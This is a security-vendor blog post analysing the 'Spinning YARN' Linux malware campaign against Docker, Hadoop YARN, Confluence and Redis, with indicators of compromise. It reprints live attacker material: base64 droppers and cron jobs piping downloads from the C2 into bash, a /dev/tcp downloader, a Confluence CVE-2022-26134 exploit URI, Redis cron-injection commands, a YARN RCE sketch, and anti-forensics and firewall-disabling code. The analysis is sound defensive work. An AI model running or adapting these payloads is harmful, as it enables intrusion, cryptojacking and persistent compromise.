June 3, 2024

Spinning YARN: A New Linux Malware Campaign Targets Docker, Apache Hadoop, Redis and Confluence

Cado Security labs researchers (now part of Darktrace) encountered a Linux malware campaign, "Spinning YARN," that targets Docker, Apache Hadoop, Redis, and Confluence. This campaign exploits vulnerabilities in these widely used platforms to gain access.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
The Darktrace Community

Introduction

Researchers from Cado Security Labs (now part of Darktrace) have encountered an emerging malware campaign targeting misconfigured servers running the following web-facing services:

  • Docker
  • Apache Hadoop YARN
  • Confluence
  • Redis

The campaign utilizes a number of unique and previously unreported payloads, including four Golang binaries that serve as tools to automate the discovery and infection of hosts running the above services. The attackers leverage these tools to issue exploit code, taking advantage of common misconfigurations and an n-day vulnerability to conduct Remote Code Execution (RCE) attacks and infect new hosts.

Once initial access is achieved, a series of shell scripts and general Linux attack techniques are used to deliver a cryptocurrency miner, spawn a reverse shell and enable persistent access to the compromised hosts. 

As always, it’s worth stressing that without the capabilities of governments or law enforcement agencies, attribution is nearly impossible – particularly where shell script payloads are concerned. However, the shell script payloads delivered by this campaign bear resemblance to those seen in prior cloud attacks, including those attributed to TeamTNT and WatchDog, along with the Kiss a Dog campaign reported by CrowdStrike. [3]

Summary:

  • Four novel Golang payloads have been discovered that automate the identification and exploitation of Docker, Hadoop YARN, Confluence and Redis hosts
  • Attackers deploy an exploit for CVE-2022-26134, an n-day vulnerability in Confluence which is used to conduct RCE attacks [4]
  • For the Docker compromise, the attackers spawn a container and escape from it onto the underlying host
  • The attackers also deploy an instance of the Platypus open-source reverse shell utility, to maintain access to the host [5]
  • Multiple user mode rootkits are deployed to hide malicious processes

Initial access

Cado Security Labs researchers first discovered this campaign after being alerted to a cluster of initial access activity on a Docker Engine API honeypot. A Docker command was received from the IP address 47[.]96[.]69[.]71 that spawned a new container, based on Alpine Linux, and created a bind mount for the underlying honeypot server’s root directory (/) to the mount point /mnt within the container itself. 

This technique is fairly common in Docker attacks, as it allows the attacker to write files to the underlying host. Typically, this is exploited to write out a job for the Cron scheduler to execute, essentially conducting a remote code execution (RCE) attack. 
In this particular campaign, the attacker exploits this exact method to write out an executable at the path /usr/bin/vurl, along with registering a Cron job to decode some base64-encoded shell commands and execute them on the fly by piping through bash.
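
Although the observed activity was delivered via raw Docker Engine API calls, the equivalent Docker CLI invocation illustrates the technique. The following is an illustrative reconstruction with placeholders, not the verbatim command observed:

    # Illustrative CLI equivalent of the observed technique: mount the host's / at /mnt
    # and write a file (e.g. a Cron job) onto the underlying host from inside the container
    docker -H tcp://<exposed-host>:2375 run --rm \
        -v /:/mnt \
        alpine:latest \
        /bin/sh -c 'echo "<cron entry>" > /mnt/etc/cron.d/<job name>'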

Image 1: Wireshark output demonstrating Docker communication, including Initial Access commands 

The vurl executable consists solely of a simple shell script function, used to establish a TCP connection with the attacker’s Command and Control (C2) infrastructure via the /dev/tcp device file. The Cron jobs mentioned above then utilize the vurl executable to retrieve the first-stage payload from the C2 server located at http[:]//b[.]9-9-8[.]com, which, at the time of the attack, resolved to the IP 107[.]189[.]31[.]172.

echo dnVybCgpIHsKCUlGUz0vIHJlYWQgLXIgcHJvdG8geCBob3N0IHF1ZXJ5IDw8PCIkMSIKICAgIGV4ZWMgMzw+Ii9kZXYvdGNwLyR7aG9zdH0vJHtQT1JUOi04MH0iCiAgICBlY2hvIC1lbiAiR0VUIC8ke3F1ZXJ5fSBIVFRQLzEuMFxyXG5Ib3N0OiAke2hvc3R9XHJcblxyXG4iID4mMwogICAgKHdoaWxlIHJlYWQgLXIgbDsgZG8gZWNobyA+JjIgIiRsIjsgW1sgJGwgPT0gJCdccicgXV0gJiYgYnJlYWs7IGRvbmUgJiYgY2F0ICkgPCYzCiAgICBleGVjIDM+Ji0KfQp2dXJsICRACg== |base64 -d    

     >/usr/bin/vurl && chmod +x /usr/bin/vurl;echo '* * * * * root echo dnVybCBodHRwOi8vYi45LTktOC5jb20vYnJ5c2ovY3JvbmIuc2gK|base64 -d|bash|bash' >/etc/crontab && echo '* * * * * root echo dnVybCBodHRwOi8vYi45LTktOC5jb20vYnJ5c2ovY3JvbmIuc2gK|base64 -d|bash|bash' >/etc/cron.d/zzh && echo KiAqICogKiAqIHJvb3QgcHl0aG9uIC1jICJpbXBvcnQgdXJsbGliMjsgcHJpbnQgdXJsbGliMi51cmxvcGVuKCdodHRwOi8vYi45XC05XC1cOC5jb20vdC5zaCcpLnJlYWQoKSIgPi4xO2NobW9kICt4IC4xOy4vLjEK|base64 -d >>/etc/crontab"

Payload retrieval commands written out to the Docker host
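
Decoding the first base64 blob above yields the vurl function itself. Reconstructed from the encoded payload (whitespace adjusted for readability), it looks like this:

    vurl() {
        IFS=/ read -r proto x host query <<<"$1"
        exec 3<>"/dev/tcp/${host}/${PORT:-80}"
        echo -en "GET /${query} HTTP/1.0\r\nHost: ${host}\r\n\r\n" >&3
        (while read -r l; do echo >&2 "$l"; [[ $l == $'\r' ]] && break; done && cat) <&3
        exec 3>&-
    }
    vurl $@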

echo dnVybCBodHRwOi8vYi45LTktOC5jb20vYnJ5c2ovY3JvbmIuc2gK|base64 -d 

    vurl http[:]//b[.]9-9-8[.]com/brysj/cronb.sh 

Contents of first Cron job decoded

To provide redundancy in the event that the vurl payload retrieval method fails, the attackers write out an additional Cron job that attempts to use Python and the urllib2 library to retrieve another payload named t.sh.

KiAqICogKiAqIHJvb3QgcHl0aG9uIC1jICJpbXBvcnQgdXJsbGliMjsgcHJpbnQgdXJsbGliMi51cmxvcGVuKCdodHRwOi8vYi45XC05XC1cOC5jb20vdC5zaCcpLnJlYWQoKSIgPi4xO2NobW9kICt4IC4xOy4vLjEK|base64 -d 

    * * * * * root python -c "import urllib2; print urllib2.urlopen('http://b.9\-9\-\8.com/t.sh').read()" >.1;chmod +x .1;./.1 

Contents of the second Cron job decoded

Unfortunately, Cado Security Labs researchers were unable to retrieve this additional payload. It is assumed that it serves a similar purpose to the cronb.sh script discussed in the next section, and is likely a variant that carries out the same attack without relying on vurl. 

It’s worth noting that, based on the decoded commands above, t.sh appears to reside outside the web directory that the other files are served from. This could be a mistake on the part of the attacker; perhaps they neglected to include that fragment of the URL when writing the Cron job.

Primary payload: cronb.sh

cronb.sh is a fairly straightforward shell script; its capabilities can be summarized as follows:

  • Define the C2 domain (http[:]//b[.]9-9-8[.]com) and URL (http[:]//b[.]9-9-8[.]com/brysj) where additional payloads are located 
  • Check for the existence of the chattr utility and rename it to zzhcht at the path in which it resides
  • If chattr does not exist, install it via the e2fsprogs package using either the apt or yum package managers before performing the renaming described above
  • Determine whether the current user is root and retrieve the next payload based on this
... 
    if [ -x /bin/chattr ];then
        mv /bin/chattr /bin/zzhcht
    elif [ -x /usr/bin/chattr ];then
        mv /usr/bin/chattr /usr/bin/zzhcht
    elif [ -x /usr/bin/zzhcht ];then
        export CHATTR=/usr/bin/zzhcht
    elif [ -x /bin/zzhcht ];then
        export CHATTR=/bin/zzhcht
    else
        if [ $(command -v yum) ];then
            yum -y reinstall e2fsprogs
            if [ -x /bin/chattr ];then
                mv /bin/chattr /bin/zzhcht
            elif [ -x /usr/bin/chattr ];then
                mv /usr/bin/chattr /usr/bin/zzhcht
            fi
        else
            apt-get -y reinstall e2fsprogs
            if [ -x /bin/chattr ];then
                mv /bin/chattr /bin/zzhcht
            elif [ -x /usr/bin/chattr ];then
                mv /usr/bin/chattr /usr/bin/zzhcht
            fi
        fi
    fi
    ... 

Snippet of cronb.sh demonstrating chattr renaming code

ar.sh

This much longer shell script prepares the system for additional compromise, performs anti-forensics on the host and retrieves additional payloads, including XMRig and an attacker-generated script that continues the infection chain.

In a function named check_exist(), the malware uses netstat to determine whether any established outbound connections to port 80 exist. If such a connection is found, the malware prints "miner running" to standard out. Later code suggests that the retrieved miner communicates with a mining pool on port 80, indicating that this is a check to determine whether the host has already been compromised.
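
A minimal sketch of that kind of check, assuming a netstat-based implementation (a hypothetical reconstruction, not the verbatim check_exist() function):

    # Hypothetical reconstruction of the check described above: look for any
    # established outbound connection to a remote port 80 and report "miner running"
    if netstat -ant 2>/dev/null | awk '$6 == "ESTABLISHED" && $5 ~ /:80$/ { found=1 } END { exit !found }'; then
        echo "miner running"
    fi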

ar.sh will then proceed to install a number of utilities, including masscan, which is used for host discovery at a later stage in the attack. With this in place, the malware proceeds to run a number of common system weakening and anti-forensics commands. These include disabling firewalld and iptables, deleting shell history (via the HISTFILE environment variable), disabling SELinux and ensuring outbound DNS requests are successful by adding public DNS servers to /etc/resolv.conf.

Interestingly, ar.sh makes use of the shopt (shell options) built-in to prevent additional shell commands from the attacker’s session from being appended to the history file. [6] This is achieved with the following command:

shopt -ou history 2>/dev/null 1>/dev/null

Not only are additional commands prevented from being written to the history file, but the shopt command itself doesn’t appear in the shell history once a new session has been spawned. This is an effective anti-forensics technique for shell script malware, one that Cado Security Labs researchers have yet to see in other campaigns.

env_set(){ 
    iptables -F 
    systemctl stop firewalld 2>/dev/null 1>/dev/null 
    systemctl disable firewalld 2>/dev/null 1>/dev/null 
    service iptables stop 2>/dev/null 1>/dev/null 
    ulimit -n 65535 2>/dev/null 1>/dev/null 
    export LC_ALL=C  
    HISTCONTROL="ignorespace${HISTCONTROL:+:$HISTCONTROL}" 2>/dev/null 1>/dev/null 
    export HISTFILE=/dev/null 2>/dev/null 1>/dev/null 
    unset HISTFILE 2>/dev/null 1>/dev/null 
    shopt -ou history 2>/dev/null 1>/dev/null 
    set +o history 2>/dev/null 1>/dev/null 
    HISTSIZE=0 2>/dev/null 1>/dev/null 
    export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games 
    setenforce 0 2>/dev/null 1>/dev/null 
    echo SELINUX=disabled >/etc/selinux/config 2>/dev/null 
    sudo sysctl kernel.nmi_watchdog=0 
    sysctl kernel.nmi_watchdog=0 
    echo '0' >/proc/sys/kernel/nmi_watchdog 
    echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf 
    grep -q 8.8.8.8 /etc/resolv.conf || ${CHATTR} -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 8.8.8.8" >> /etc/resolv.conf; 
    grep -q 114.114.114.114 /etc/resolv.conf || ${CHATTR} -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 8.8.4.4" >> /etc/resolv.conf; 
    } 

System weakening commands from ar.sh – env_set() function

Following the above techniques, ar.sh will proceed to install the libprocesshider and diamorphine user mode rootkits and use these to hide their malicious processes [7][8]. The rootkits are retrieved from the attacker’s C2 server and compiled on delivery. The use of both libprocesshider and diamorphine is particularly common in cloud malware campaigns and was most recently exhibited by a Redis miner discovered by Cado Security Labs in February 2024 [9].
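
For context, libprocesshider is conventionally deployed by compiling a shared object and registering it in /etc/ld.so.preload so that a named process is filtered out of /proc listings. The commands below are a generic illustration based on the project's documentation [7], not the exact build steps used by ar.sh:

    # Generic libprocesshider deployment (illustrative; process_to_filter in
    # processhider.c is edited to the name of the process to hide)
    git clone https://github.com/gianlucaborello/libprocesshider
    cd libprocesshider
    make                                                  # builds libprocesshider.so
    mv libprocesshider.so /usr/local/lib/
    echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload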

Additional system weakening code in ar.sh focuses on uninstalling monitoring agents for Alibaba Cloud and Tencent, suggesting some targeting of these cloud environments in particular. Targeting of these East Asian cloud providers has been observed previously in campaigns by the threat actor WatchDog [10].

Other notable capabilities of ar.sh include: 

  • Insertion of an attacker-controlled SSH key to maintain access to the compromised host
  • Retrieval of the miner binary (a fork of XMRig), which is saved to /var/tmp/.11/sshd
  • Retrieval of bioset, an open-source Golang reverse shell utility named Platypus, saved to /var/tmp/.11/bioset [5]
  • The bioset payload was intended to communicate with an additional C2 server located at 209[.]141[.]37[.]110:14447; communication with this host was unsuccessful at the time of analysis
  • Registering persistence in the form of systemd services for both bioset and the miner itself
  • Discovery of SSH keys and related IPs
  • The script also attempts to spread the cronb.sh malware to these discovered IPs via an SSH remote command
  • Retrieval and execution of a binary executable named fkoths (discussed in a later section)
... 
            ${CHATTR} -ia /etc/systemd/system/sshm.service && rm -f /etc/systemd/system/sshm.service 
    cat >/tmp/ext4.service << EOLB 
    [Unit] 
    Description=crypto system service 
    After=network.target 
    [Service] 
    Type=forking 
    GuessMainPID=no 
    ExecStart=/var/tmp/.11/sshd 
    WorkingDirectory=/var/tmp/.11 
    Restart=always 
    Nice=0  
    RestartSec=3 
    [Install] 
    WantedBy=multi-user.target 
    EOLB 
    fi 
    grep -q '/var/tmp/.11/bioset' /etc/systemd/system/sshb.service 
    if [ $? -eq 0 ] 
    then  
            echo service exist 
    else 
            ${CHATTR} -ia /etc/systemd/system/sshb.service && rm -f /etc/systemd/system/sshb.service 
    cat >/tmp/ext3.service << EOLB 
    [Unit] 
    Description=rshell system service 
    After=network.target 
    [Service] 
    Type=forking 
    GuessMainPID=no 
    ExecStart=/var/tmp/.11/bioset 
    WorkingDirectory=/var/tmp/.11 
    Restart=always 
    Nice=0  
    RestartSec=3 
    [Install] 
    WantedBy=multi-user.target 
    EOLB 
    fi 
    ... 

Examples of systemd service creation code for the miner and bioset binaries

Finally, ar.sh creates an infection marker on the host in the form of a simple text file located at /var/tmp/.dog. The script first checks that the /var/tmp/.dog file exists. If it doesn’t, the file is created and the string lockfile is echoed into it. This serves as a useful detection mechanism to determine whether a host has been compromised by this campaign. 

ar.sh concludes by retrieving s.sh from the C2 server, once again using the vurl function.

fkoths

This payload is the first of several 64-bit Golang ELFs deployed by the malware. The functionality of this executable is incredibly straightforward. Besides main(), it contains two additional functions named DeleteImagesByRepo() and AddEntryToHost(). 

DeleteImagesByRepo() simply searches for Docker images from the Ubuntu or Alpine repositories, and deletes those if found. Go’s heavy use of the stack makes it somewhat difficult to determine which repositories the attackers were targeting based on static analysis alone. Fortunately, this becomes evident when monitoring the stack in a debugger.

Image 2: Example stack contents when DeleteImagesByRepo() is called

It’s clear from the initial access stage that the attackers leverage the alpine:latest image to initiate their attack on the host. Based on this, it’s been assessed with high confidence that the purpose of this function is to clear up any evidence of this initial access, essentially performing anti-forensics on the host. 

The AddEntryToHost() function, as the name suggests, updates the /etc/hosts file with the following line:

127.0.0.1 registry-1.docker.io 

This has the effect of “blackholing” outbound requests to the Docker registry, preventing additional container images from being pulled from Docker Hub. This same technique was observed recently by Cado Security Labs researchers in the Commando Cat campaign [11].

s.sh

The next stage in the infection chain is the execution of yet another shell script, this time used to download additional binary payloads and persist them on the host. Like the scripts before it, s.sh begins by defining the C2 domain (http[:]//b[.]9-9-8[.]com), using a base64-encoded string. The malware then proceeds to create the following directory structure and change into it: /etc/…/.ice-unix/.

Within the .ice-unix directory, the attacker creates another infection marker on the host, this time in a file named .watch. If the file doesn’t already exist, the script will create it and echo the integer 1 into it. Once again, this serves as a useful detection mechanism for determining whether your host has been compromised by this campaign.
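
Taken together with the /var/tmp/.dog marker, the /var/tmp/.11 payload directory and the systemd services described elsewhere in this post, a quick triage check for this campaign might look like the following (illustrative only, not exhaustive):

    # Illustrative triage checks based on indicators described in this post
    [ -f /var/tmp/.dog ] && echo "ar.sh infection marker present (/var/tmp/.dog)"
    ls -la /var/tmp/.11/ 2>/dev/null && echo "miner/reverse shell payload directory present"
    grep -n 'registry-1\.docker\.io' /etc/hosts 2>/dev/null && echo "Docker registry blackholed in /etc/hosts"
    systemctl list-unit-files 2>/dev/null | grep -E 'sshm|sshb|zzh[rdwh]' && echo "suspicious systemd services present"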

With this in place, the malware proceeds to install a number of packages via the apt or yum package managers. Notable packages include:

  • build-essential
  • gcc
  • redis-server
  • redis-tools
  • redis
  • unhide
  • masscan
  • docker.io
  • libpcap (a dependency of pnscan)

From this, it is believed that the attacker intends to compile some code on delivery, interact with Redis, conduct Internet scanning with masscan and interact with Docker. 

With the package installation complete, s.sh proceeds to retrieve zgrab and pnscan from the C2 server; these are used for host discovery in a later stage. The script then proceeds to retrieve the following executables:

  • c.sh – saved as /etc/.httpd/.../httpd
  • d.sh – saved as /var/.httpd/.../httpd
  • w.sh – saved as /var/.httpd/..../httpd
  • h.sh – saved as /var/.httpd/...../httpd

s.sh then proceeds to define systemd services to persistently launch the retrieved executables, before saving them to the following paths:

  • /etc/systemd/system/zzhr.service (c.sh)
  • /etc/systemd/system/zzhd.service (d.sh)
  • /etc/systemd/system/zzhw.service (w.sh)
  • /etc/systemd/system/zzhh.service (h.sh)

... 
    if [ ! -f /var/.httpd/...../httpd ];then 
        vurl $domain/d/h.sh > httpd 
        chmod a+x httpd 
        echo "FUCK chmod2" 
        ls -al /var/.httpd/..... 
    fi 
    cat >/tmp/h.service <<EOL 
    [Service] 
    LimitNOFILE=65535 
    ExecStart=/var/.httpd/...../httpd 
    WorkingDirectory=/var/.httpd/..... 
    Restart=always  
    RestartSec=30 
    [Install] 
    WantedBy=default.target 
    EOL 
    ... 

Example of payload retrieval and service creation code for the h.sh payload

Initial access and spreader utilities: h.sh, d.sh, c.sh, w.sh

In the previous stage, the attacker retrieves and attempts to persist the payloads c.sh, d.sh, w.sh and h.sh. These executables are dedicated to identifying and exploiting hosts running each of the four services mentioned previously. 

Despite their names, all of these payloads are 64-bit Golang ELF binaries. Interestingly, the malware developer neglected to strip the binaries, leaving DWARF debug information intact. There has been no effort made to obfuscate strings or other sensitive data within the binaries either, making them trivial to reverse engineer. 

The purpose of these payloads is to use masscan or pnscan (compiled on delivery in an earlier stage) to scan a randomized network segment and search for hosts with ports 2375, 8088, 8090 or 6379 open. These are default ports used by the Docker Engine API, Apache Hadoop YARN, Confluence and Redis respectively. 

h.sh, d.sh and w.sh contain identical functions to generate a list of IPs to scan and hunt for these services. First, the Golang time_Now() function is called to provide a seed for a random number generator. This is passed to a function generateRandomOctets() that’s used to define a randomised /8 network prefix to scan. Example values include:

  • 109.0.0.0/8
  • 84.0.0.0/8
  • 104.0.0.0/8
  • 168.0.0.0/8
  • 3.0.0.0/8
  • 68.0.0.0/8

For each randomized octet, masscan is invoked and the resulting IPs are written out to the file scan_<octet>.0.0.0_8.txt in the working directory. 

d.sh

Image 3: Disassembly demonstrating use of os/exec to run masscan

For d.sh, this procedure is used to identify hosts with the default Docker Engine API port (2375) open. The full masscan command is as follows:

masscan <octet>.0.0.0/8 -p 2375 --rate 10000 -oL scan_<octet>.0.0.0_8.txt 

The masscan output file is then read and the list of IPs is converted into a format readable by zgrab, before being written out to the file ips_for_zgrab_<octet>.txt [12].

For d.sh, zgrab will read these IPs and issue a HTTP GET request to the /v1.16/version endpoint of the Docker Engine API. The zgrab command in its entirety is as follows:

zgrab --senders 5000 --port=2375 --http='/v1.16/version' --output-file=zgrab_output_<octet>.0.0.0_8.json < ips_for_zgrab_<octet>.txt 2>/dev/null 

Successful responses to this HTTP request let the attacker know that Docker Engine is indeed running on port 2375 for the IP in question. The list of IPs to have responded successfully is then written out to zgrab_output_<octet>.0.0.0_8.json. 
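
Exposure of this endpoint is straightforward to confirm manually. For instance, an unauthenticated version query against a host with the Docker Engine API exposed looks roughly like this (illustrative, not part of the campaign's tooling):

    # Illustrative check for an exposed Docker Engine API
    curl -s http://<target-ip>:2375/v1.16/version
    # A JSON response containing the Docker Engine version indicates the API is exposed and unauthenticated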

Next, the payload calls a function helpfully named executeDockerCommand() for each of the IPs discovered by zgrab. As the name suggests, this function executes the Docker command covered in the Initial Access section above, kickstarting the infection chain on a new vulnerable host. 

Image 4: Decompiler output demonstrating Docker command construction routine

h.sh

This payload contains identical logic for the randomized octet generation and follows the same procedure of using masscan and zgrab to identify targets. The main difference in this payload’s discovery phase is the targeting of Apache Hadoop servers, rather than Docker Engine deployments. As a result, the masscan and zgrab commands are slightly different:

masscan <octet>.0.0.0/8 -p 8088 --rate 10000 -oL scan_<octet>.0.0.0_8.txt 
zgrab --senders 1000 --port=8088 --http='/stacks' --output-file=zgrab_output_<octet>.0.0.0_8.json < ips_for_zgrab_<octet>.txt 2>/dev/null 

From this, we can determine that d.sh is a Docker discovery and initial access tool, whereas h.sh is an Apache Hadoop discovery and initial access tool. 

Instead of invoking the executeDockerCommand() function, this payload instead invokes a function named executeYARNCommand() to handle the interaction with Hadoop. Similar to the Docker API interaction described previously, the purpose of this is to target Apache Hadoop YARN, a component of Hadoop that is responsible for scheduling tasks within the cluster [1].

If the YARN API is exposed to the open Internet, it’s possible to conduct a RCE attack by sending a JSON payload in a HTTP POST request to the /ws/v1/cluster/apps/ endpoint. This method of conducting RCE has been leveraged previously to deliver cloud-focused malware campaigns, such as Kinsing [13].
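
The general shape of this well-documented technique is sketched below; the JSON is simplified with placeholders and is not the campaign's exact payload:

    # Generic sketch of the Hadoop YARN ResourceManager RCE technique (illustrative only)
    # 1. Request a new application ID from the exposed ResourceManager REST API
    curl -s -X POST "http://<target-ip>:8088/ws/v1/cluster/apps/new-application"
    # -> returns JSON containing an "application-id" value

    # 2. Submit an application whose container command is an arbitrary shell command
    curl -s -X POST -H 'Content-Type: application/json' \
        "http://<target-ip>:8088/ws/v1/cluster/apps" \
        -d '{
              "application-id": "<application-id from step 1>",
              "application-name": "new-application",
              "am-container-spec": { "commands": { "command": "<shell command to execute>" } },
              "application-type": "YARN"
            }'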

Image 5: Example of YARN HTTP POST generation pseudocode in h.sh

The POST request contains a JSON body with the same base64-encoded initial access command we covered previously. The JSON payload defines a new application (task to be scheduled, in this case a shell command) with the name new-application. This shell command decodes the base64 payload that defines vurl and retrieves the first stage of the infection chain. 

Success in executing this command kicks off the infection once again on a Hadoop host, allowing the attackers persistent access and the ability to run their XMRig miner.

w.sh 

This executable repeats the discovery procedure outlined in the previous two initial access/discovery payloads, except this time the target port is changed to 8090 – the default port used by Confluence. [2]

For each IP discovered, the malware uses zgrab to issue a HTTP GET request to the root directory of the server. This request includes a URI containing an exploit for CVE-2022-26134, a vulnerability in the Confluence server that allows attackers to conduct RCE attacks. [4]  

As you might expect, this RCE is once again used to execute the base64-encoded initial access command mentioned previously.

Image 6: Decompiler output displaying CVE-2022-26134 exploit code

Without URL encoding, the full URI appears as follows:

/${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','echo dnVybCgpIHsKCUlGUz0vIHJlYWQgLXIgcHJvdG8geCBob3N0IHF1ZXJ5IDw8PCIkMSIKICAgIGV4ZWMgMzw+Ii9kZXYvdGNwLyR7aG9zdH0vJHtQT1JUOi04MH0iCiAgICBlY2hvIC1lbiAiR0VUIC8ke3F1ZXJ5fSBIVFRQLzEuMFxyXG5Ib3N0OiAke2hvc3R9XHJcblxyXG4iID4mMwogICAgKHdoaWxlIHJlYWQgLXIgbDsgZG8gZWNobyA+JjIgIiRsIjsgW1sgJGwgPT0gJCdccicgXV0gJiYgYnJlYWs7IGRvbmUgJiYgY2F0ICkgPCYzCiAgICBleGVjIDM+Ji0KfQp2dXJsIGh0dHA6Ly9iLjktOS04LmNvbS9icnlzai93LnNofGJhc2gK|base64 -d|bash').start()")}/ 

c.sh 

This final payload is dedicated to exploiting misconfigured Redis deployments. Of course, targeting of Redis is incredibly common amongst cloud-focused threat actors, making it unsurprising that Redis would be included as one of the four services targeted by this campaign [9].

This sample includes a slightly different discovery procedure from the previous three. Instead of using a combination of zgrab and masscan to identify targets, c.sh opts to execute pnscan across a range of randomly-generated IP addresses. 

After execution, the malware sets the maximum number of open files to 5000 via the setrlimit() syscall, before proceeding to delete a file named .dat in the current working directory, if it exists. If the file doesn’t exist, the malware creates it and writes the following redis-cli commands to it, in preparation for execution on identified Redis hosts:

save 
    config set stop-writes-on-bgsave-error no 
    flushall 
    set backup1 "\n\n\n\n*/2 * * * * echo Y2QxIGh0dHA6Ly9iLjktOS04LmNvbS9icnlzai9iLnNoCg==|base64 -d|bash|bash \n\n\n" 
    set backup2 "\n\n\n\n*/3 * * * * echo d2dldCAtcSAtTy0gaHR0cDovL2IuOS05LTguY29tL2JyeXNqL2Iuc2gK|base64 -d|bash|bash \n\n\n" 
    set backup3 "\n\n\n\n*/4 * * * * echo Y3VybCBodHRwOi8vL2IuOS05LTguY29tL2JyeXNqL2Iuc2gK|base64 -d|bash|bash \n\n\n" 
    set backup4 "\n\n\n\n@hourly  python -c \"import urllib2; print urllib2.urlopen(\'http://b.9\-9\-8\.com/t.sh\').read()\" >.1;chmod +x .1;./.1 \n\n\n" 
    config set dir "/var/spool/cron/" 
    config set dbfilename "root" 
    save 
    config set dir "/var/spool/cron/crontabs" 
    save 
    flushall 
    set backup1 "\n\n\n\n*/2 * * * * root echo Y2QxIGh0dHA6Ly9iLjktOS04LmNvbS9icnlzai9iLnNoCg==|base64 -d|bash|bash \n\n\n" 
    set backup2 "\n\n\n\n*/3 * * * * root echo d2dldCAtcSAtTy0gaHR0cDovL2IuOS05LTguY29tL2JyeXNqL2Iuc2gK|base64 -d|bash|bash \n\n\n" 
    set backup3 "\n\n\n\n*/4 * * * * root echo Y3VybCBodHRwOi8vL2IuOS05LTguY29tL2JyeXNqL2Iuc2gK|base64 -d|bash|bash \n\n\n" 
    set backup4 "\n\n\n\n@hourly  python -c \"import urllib2; print urllib2.urlopen(\'http://b.9\-9\-8\.com/t.sh\').read()\" >.1;chmod +x .1;./.1 \n\n\n" 
    config set dir "/etc/cron.d" 
    config set dbfilename "zzh" 
    save 
    config set dir "/etc/" 
    config set dbfilename "crontab" 
    save 

This achieves RCE on targeted hosts by writing a Cron job (containing shell commands that retrieve the cronb.sh payload) into the Redis database, then saving the database file to one of the Cron directories. When the scheduler reads this file, the embedded Cron job is parsed and eventually executed. This is a common Redis exploitation technique, covered extensively by Cado in previous blogs [9].

After running the random octet generation code described previously, the malware then uses pnscan to attempt to scan the randomized /16 subnet and identify misconfigured Redis servers. The pnscan command is as follows:

/usr/local/bin/pnscan -t512 -R 6f 73 3a 4c 69 6e 75 78 -W 2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a 221.0.0.0/16 6379 
  • The -t argument enforces a timeout of 512 milliseconds for outbound connections
  • The -R argument looks for a specific hex-encoded response from the target server; the bytes decode to the string os:Linux, a fragment of the banner returned by Redis's INFO command on Linux hosts
  • The -W argument is a hex-encoded request string to send to the server; the bytes decode to *1\r\n$4\r\ninfo\r\n, the RESP-encoded info command, which prompts the server to return the banner information searched for with the -R argument (both decodings are reproduced below)
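
These decodings can be reproduced directly from the hex strings in the pnscan command, for example:

    # Reproduce the decoding of the pnscan -R and -W arguments shown above
    echo '6f 73 3a 4c 69 6e 75 78' | xxd -r -p                            # -> os:Linux
    echo '2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a' | xxd -r -p | cat -A # -> the RESP-encoded info command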
Image 7: Disassembly demonstrating pnscan command construction and execution

For each identified IP, the following Redis command is run:

redis-cli -h <IP address> -p <port> --raw <content of .dat>

Of course, this has the effect of reading the redis-cli commands in the .dat file and executing them on discovered hosts.

Conclusion

This extensive attack demonstrates the variety in initial access techniques available to cloud and Linux malware developers. Attackers are investing significant time into understanding the types of web-facing services deployed in cloud environments, keeping abreast of reported vulnerabilities in those services and using this knowledge to gain a foothold in target environments. 

Docker Engine API endpoints are frequently targeted for initial access. In the first quarter of 2024 alone, Cado Security Labs researchers have identified three new malware campaigns exploiting Docker for initial access, including this one. [11, 14] The deployment of an n-day vulnerability against Confluence also demonstrates a willingness to weaponize security research for nefarious purposes.

Although it’s not the first time Apache Hadoop has been targeted, it’s interesting to note that attackers still find the big data framework a lucrative target. It’s unclear whether the decision to target Hadoop in addition to Docker is based on the attacker’s experience or knowledge of the target environment.

Indicators of compromise

Filename – SHA256

  • cronb.sh – d4508f8e722f2f3ddd49023e7689d8c65389f65c871ef12e3a6635bbaeb7eb6e
  • ar.sh – 64d8f887e33781bb814eaefa98dd64368da9a8d38bd9da4a76f04a23b6eb9de5
  • fkoths – afddbaec28b040bcbaa13decdc03c1b994d57de244befbdf2de9fe975cae50c4
  • s.sh – 251501255693122e818cadc28ced1ddb0e6bf4a720fd36dbb39bc7dedface8e5
  • bioset – 0c7579294124ddc32775d7cf6b28af21b908123e9ea6ec2d6af01a948caf8b87
  • d.sh – 0c3fe24490cc86e332095ef66fe455d17f859e070cb41cbe67d2a9efe93d7ce5
  • h.sh – d45aca9ee44e1e510e951033f7ac72c137fc90129a7d5cd383296b6bd1e3ddb5
  • w.sh – e71975a72f93b134476c8183051fee827ea509b4e888e19d551a8ced6087e15c
  • c.sh – 5a816806784f9ae4cb1564a3e07e5b5ef0aa3d568bd3d2af9bc1a0937841d174

Paths

  • /usr/bin/vurl
  • /etc/cron.d/zzh
  • /bin/zzhcht
  • /usr/bin/zzhcht
  • /var/tmp/.11/sshd
  • /var/tmp/.11/bioset
  • /var/tmp/.11/..lph
  • /var/tmp/.dog
  • /etc/systemd/system/sshm.service
  • /etc/systemd/system/sshb.service
  • /etc/systemd/system/zzhr.service
  • /etc/systemd/system/zzhd.service
  • /etc/systemd/system/zzhw.service
  • /etc/systemd/system/zzhh.service
  • /etc/…/.ice-unix/
  • /etc/…/.ice-unix/.watch
  • /etc/.httpd/…/httpd
  • /var/.httpd/…/httpd
  • /var/.httpd/…./httpd
  • /var/.httpd/…../httpd

IP addresses

  • 47[.]96[.]69[.]71
  • 107[.]189[.]31[.]172
  • 209[.]141[.]37[.]110

Domains/URLs

  • http[:]//b[.]9-9-8[.]com
  • http[:]//b[.]9-9-8[.]com/brysj/cronb.sh
  • http[:]//b[.]9-9-8[.]com/brysj/d/ar.sh
  • http[:]//b[.]9-9-8[.]com/brysj/d/c.sh
  • http[:]//b[.]9-9-8[.]com/brysj/d/h.sh
